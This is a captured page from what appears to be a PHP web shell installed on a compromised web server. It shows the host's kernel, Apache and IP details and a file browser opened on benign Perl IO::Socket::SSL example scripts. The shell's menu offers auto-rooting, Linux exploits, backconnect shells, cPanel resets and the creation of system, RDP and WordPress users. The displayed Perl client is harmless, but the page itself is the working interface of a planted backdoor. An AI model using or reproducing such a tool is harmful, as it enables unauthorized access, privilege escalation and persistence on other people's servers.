Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.219.12.88
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-IO-Socket-SSL-1.94 /
example /
[ HOME SHELL ]
Name
Size
Permission
Action
async_https_server.pl
4.46
KB
-rw-r--r--
lwp-with-verifycn.pl
382
B
-rw-r--r--
ssl_client.pl
1.3
KB
-rw-r--r--
ssl_mitm.pl
1.68
KB
-rw-r--r--
ssl_server.pl
1.59
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ssl_client.pl
# # a test client for testing IO::Socket::SSL-class's behavior # (marko.asplund at kronodoc.fi). # # $Id: ssl_client.pl,v 1.7 2002/01/04 08:45:12 aspa Exp $. # use strict; use IO::Socket::SSL; my ($v_mode, $sock, $buf); if($ARGV[0] eq "DEBUG") { $IO::Socket::SSL::DEBUG = 1; } # Check to make sure that we were not accidentally run in the wrong # directory: unless (-d "certs") { if (-d "../certs") { chdir ".."; } else { die "Please run this example from the IO::Socket::SSL distribution directory!\n"; } } if(!($sock = IO::Socket::SSL->new( PeerAddr => 'localhost', PeerPort => '9000', Proto => 'tcp', SSL_use_cert => 1, SSL_verify_mode => 0x01, SSL_passwd_cb => sub { return "opossum" }, ))) { warn "unable to create socket: ", &IO::Socket::SSL::errstr, "\n"; exit(0); } else { warn "connect ($sock).\n" if ($IO::Socket::SSL::DEBUG); } # check server cert. my ($subject_name, $issuer_name, $cipher); if( ref($sock) eq "IO::Socket::SSL") { $subject_name = $sock->peer_certificate("subject"); $issuer_name = $sock->peer_certificate("issuer"); $cipher = $sock->get_cipher(); } warn "cipher: $cipher.\n", "server cert:\n", "\t '$subject_name' \n\t '$issuer_name'.\n\n"; my ($buf) = $sock->getlines; $sock->close(); print "read: '$buf'.\n";
Close